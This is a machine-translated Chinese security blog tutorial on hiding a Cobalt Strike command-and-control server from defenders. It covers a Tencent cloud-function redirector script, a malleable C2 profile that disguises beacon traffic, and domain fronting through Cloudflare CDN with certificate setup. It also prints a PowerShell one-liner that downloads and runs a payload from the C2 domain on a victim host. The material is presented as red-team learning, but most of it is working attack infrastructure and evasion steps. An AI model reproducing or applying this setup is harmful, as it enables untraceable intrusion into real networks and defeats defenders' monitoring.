author ： , mac0x01

Article address ：https://www.freebuf.com/articles/network/330713.html

Cobalt Strike（ hereinafter referred to as CS） It is a frame type penetration tool , Can be simulated APT Conduct intranet penetration in attack and defense confrontation . It also integrates port forwarding 、 Scan multimode ports Listener、Windows exe Program generation 、Windows dll Dynamic link library generation 、java Program generation 、office Macro code generation 、 Even including site cloning to obtain browser information . As an artifact in the field of network security , at present CS The traffic has been mature IDS、IPS Identification detection , Once the defender finds out CS Flow or traceability to CS On the server side IP Address , Infiltration and invasion may fall short . So we need to encrypt traffic protection CS The server will not be detected by the security monitoring of the defender or even traced back to ours CS The server , At present, the common hiding methods include domain prefixes 、CDN、 Cloud functions, etc , Next, I'll introduce these common hiding C2 The way .

0x01 Cloud functions

Introduction to cloud functions

Cloud functions （Serverless Cloud Function,SCF） It mainly provides a serverless execution environment for enterprises and developers , You can run code without having to purchase and manage a server . Developers only need to use the language supported by the platform to write the core code and set the conditions for the code to run , It can be flexible on the cloud infrastructure 、 Run the code safely .

Using cloud functions, we can hide ourselves well , This is mainly because cloud functions are deployed in multiple places , Each request will switch to a different IP Address , Although the default access domain name will still be obtained by the defender , But in general, the defense can not be based on API Get our personal information directly from Tencent cloud . So we can hide it through the characteristics of cloud functions CS Server side .

Create cloud functions

Create a custom cloud function on a cloud and set the function name , The specific Settings are as follows ：

The server script in which the cloud function is written

# coding: utf8
import json,requests,base64
def main_handler(event, context):
    response = {}
    path = None
    headers = None
    try:
        #  Modify according to your ECS address 
        C2='http://x.x.x.x:80'
        if 'path' in event.keys():
            path=event['path']
        if 'headers' in event.keys():    
            headers=event['headers']
        if 'httpMethod' in event.keys() and event['httpMethod'] == 'GET' :
            resp=requests.get(C2+path,headers=headers,verify=False) 
        else:
            resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)
            print(resp.headers)
            print(resp.content)
        response={
            "isBase64Encoded": True,
            "statusCode": resp.status_code,
            "headers": dict(resp.headers),
            "body": str(base64.b64encode(resp.content))[2:-1]
        }
    except Exception as e:
        print('error')
        print(e)
    finally:
        return response

screenshots 2021-12-23 In the morning 3.00.27

Configure trigger selection api Gateway triggered , Other settings are as follows ：

edit API And change the path to /, Publish the service after modification

C2 Server test

stay CS Server customization malleable C2 To hide traffic .malleable C2 Mainly through modification C2 The configuration file 、 change beacon Of payload Properties and behaviors to forge normal traffic .

set sample_name "func";
set sleeptime "3000";
set jitter    "0";
set maxdns    "255";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";

http-get {

    set uri "/api/x";

    client {
        header "Accept" "*/*";
        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Server" "Nodejs";
        output {
            base64;
            print;
        }
    }
}
http-stager {  
    set uri_x86 "/vue.min.js";
    set uri_x64 "/bootstrap-2.min.js";
}
http-post {
    set uri "/api/y";
    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "JSESSION=";
            header "Cookie";
        }
        output {
            base64;
            print;
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Connection" "keep-alive";
        output {
            base64;
            print;
        }
    }
}

After creation, name it api.profile And pass teamserver Start server

./teamserver x.x.x.x xxx api.profile

C2 go online

In the cloud function service, we can find the default API Access address , Note that this address is the key to cloud function utilization .

stay CS Client create listener cs_hidden, Set the return address to the default API Access address service-xxxx-xxx.xx.xx.tencentcs.com

Generate the corresponding Trojan horse and set the listener to the newly created cs_hidden

After execution, it can be successfully launched CS, If the Internet address is constantly changing , Then it means that the cloud function is successfully utilized

In the cloud function log, we can trace that the request has been called successfully

Try to put the Trojan horse into the micro step cloud sandbox for detection . We can find our CS Another host appears on the

In the Weibu cloud sandbox, you can clearly see that the requested domain name is the Tencent cloud domain name and IP The address is... Of Tencent cloud IDC The server , Not our real CS The server IP Address , explain CS The server has successfully hidden .

0x02 CDN、 Domain preposition

Domain pre Introduction

Domain preposition （domain Fronting） It's based on https General circumvention techniques , Also known as domain front-end network technology , It's a way to hide Metasploit、Cobalt Strike Wait for the team to control server traffic , So as to bypass the inspection or firewall detection technology to a certain extent , Generally like Amazon、Google、Akamai And other large manufacturers will provide domain front-end technical services .

Similar to cloud functions , Domain prepositioning technology is mainly through CDN Nodes forward traffic to real C2 The server ,CDN node ip By identifying the requested Host The header forwards the traffic , Use us to configure the high reliability of the domain name , Then you can effectively avoid targeting DLP、agent And so on .

CDN Introduce

The core of the domain front is CDN, Its working principle is single IP It can be bound by different domain names for website acceleration . For example, there are now www.a.com and www.b.com These two domains , They all point to the same IP, The IP It's actually CDN The server . So when we use a browser to access these two domain names , How to ensure that the target of access is the specified website content ？ We can do it in http Request... In the package Host Add the domain name to the request header , So as to locate the website you need to visit .

If you don't understand, we can use actual cases to demonstrate , It assumes that 1.1.1.1 by CDN The server , www.a.com and www.b.com For the domain name on this server , These two domain names are bound CDN Speed up .

use first curl Command request www.a.com, The information of the target site is returned successfully

curl www.a.com -v 

screenshots 2022-04-12 04.49.45

Then try to request CDN What happens to the server ？ The result returned to 403

curl 1.1.1.1 -v

screenshots 2022-04-12 04.53.15

But we just need to add Host The header can access www.a.com The content of

curl 1.1.1.1 -H "Host: www.a.com" -v

screenshots 2022-04-12 04.53.49

Environment building

We can configure the environment as follows , The whole set probably cost 6 dollar

• Cloud server
• Cobalt Strike 4.3
• Cloudfare CDN Speed up
• domain name

Domain name purchase address ：https://porkbun.com

ECS purchase address ：https://my.vultr.com

CDN Registered address ：https://www.cloudfare.com

Buy servers

stay vultr Sign up for an account in , After registration, I choose PayPal binding , It will take about a day to verify my account , If not, of course PayPal You can also use AliPay、 Credit card binding .

After binding, the new account will be sent to 150 dollar , Choose your favorite configuration to deploy ECs , Deployed successfully IP The address is 2.2.2.2

Purchase domain name

stay porkbun Registered account in , Successfully purchased our new domain name xxx.xyz

To configure CDN

stay Cloudflare Bind the domain name purchased above in , The result shows that we need to modify the domain name DNS Record

Modify the domain name resolution server as follows ：

jake.ns.cloudflare.com
magdalena.ns.cloudflare.com

screenshots 2022-04-19 03.04.18

Wait after modification Cloudflare Rematch , Until the following interface description appears CDN Deployment success

add to DNS The analysis record is as follows , At the same time, we also

A c2 2.2.2.2
A xxx.xyz 2.2.2.2

screenshots 2022-04-19 11.19.15

test CDN Whether the node has been resolved , Successful parsing means that everything is going well at present

curl 172.67.175.223 -H "Host: xxx.xyz" -v

screenshots 2022-04-19 11.29.56

stay Cloudflare In the open SSL And set up SSL/TLS The encryption mode is full

establish SSL/TLS certificate , The specific configuration is as follows

Click create to successfully generate the corresponding source certificate and private key

C2 Server test

Customize on the ECS malleable C2 To configure the certificate , Use openssl utilize CDN Of SSL/TLS Source certificate and private key generation PFX file spoofdomain.p12

openssl pkcs12 -export -in cloudflare.pem -inkey cloudflare.key -out spoofdomain.p12 -name c2.maccc.xyz -passout pass:macmacmac

Keytool It's a Java Data certificate management tools , Use it to generate the above key and certificate PFX File exists keystore file new.store among

keytool -importkeystore -deststorepass macmacmac -destkeypass macmacmac -destkeystore new.store -srckeystore spoofdomain.p12 -srcstoretype PKCS12 -srcstorepass macmacmac -alias c2.xxx.xyz

screenshots 2022-04-20 16.38.13

Tool download address ：https://github.com/FortyNorthSecurity/C2concealer

C2concealer Is a random generation CS The use of C2 malleable profiles Command line tools for , If it is not installed, you can use the following command to install

chmod u+x install.sh
./install.sh

screenshots 2022-04-20 16.46.02

Use C2concealer Generate CS Configuration file for

C2concealer --variant 1 --hostname c2.xxx.xyz
#  Select steps 
1.3
2./root/CS4.3/new.store
3. Enter the account and password 

screenshots 2022-04-20 16.49.25

The file named random number is generated successfully CS The configuration file , Copy it to CS Directory and rename to test.profile

cp 56069b6a.profile /root/CS4.3/test.profile
cd /root/CS4.3/
ls

screenshots 2022-04-20 16.51.58

Use c2lint Check the configuration file

chmod +x c2lint
./c2lint test.profile

screenshots 2022-04-20 16.53.33

modify teamserver To configure , Of course, we'd better CS Default port for 50050 It can also be changed to other ports

vim teamserver
#  Configuration modification 
javax.net.ssl.keyStore=./new.store
-Djavax.net.ssl.keyStorePassword=macmacmac

screenshots 2022-04-20 17.49.49

start-up teamserver And load the configuration file test.profile

./teamserver 2.2.2.2 macmacmac test.profile

C2 go online

stay CS Client generation https Monitor

Configuration has SSL Of web service , choice payload The type is powershell

Successfully generated powershell Version of payload

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://c2.xxx.xyz:443/test'))"

After being executed in the target aircraft, it can be successfully launched , At the same time, we can find that the external address changes with each request , So the defenders go back to us C2 Server's IP The probability of address is very low

stay CS Successfully execute the command in and start on the victim host WireShark Grab the bag

stay WireShark The middle runners are all TLS Encrypted traffic 、 The destination address is random CDN node , So it can't be traced back to us C2 The reality of the server IP

0x03 summary

Through this period of time, I learned about traffic encryption , I find that cyber attack and defense are always changing , It's like CDN At the beginning of design, it is mainly used to protect the authenticity of the website IP, But as attackers, we can also use it to protect our C2 The server ; While using OpenSSL Generated RSA In addition to authentication, certificates can also help attackers encrypt traffic 、 Hide communication .

Reference article 1：https://blog.csdn.net/weixin_44604541/article/details/118413649

Reference article 2：https://www.anquanke.com/post/id/243146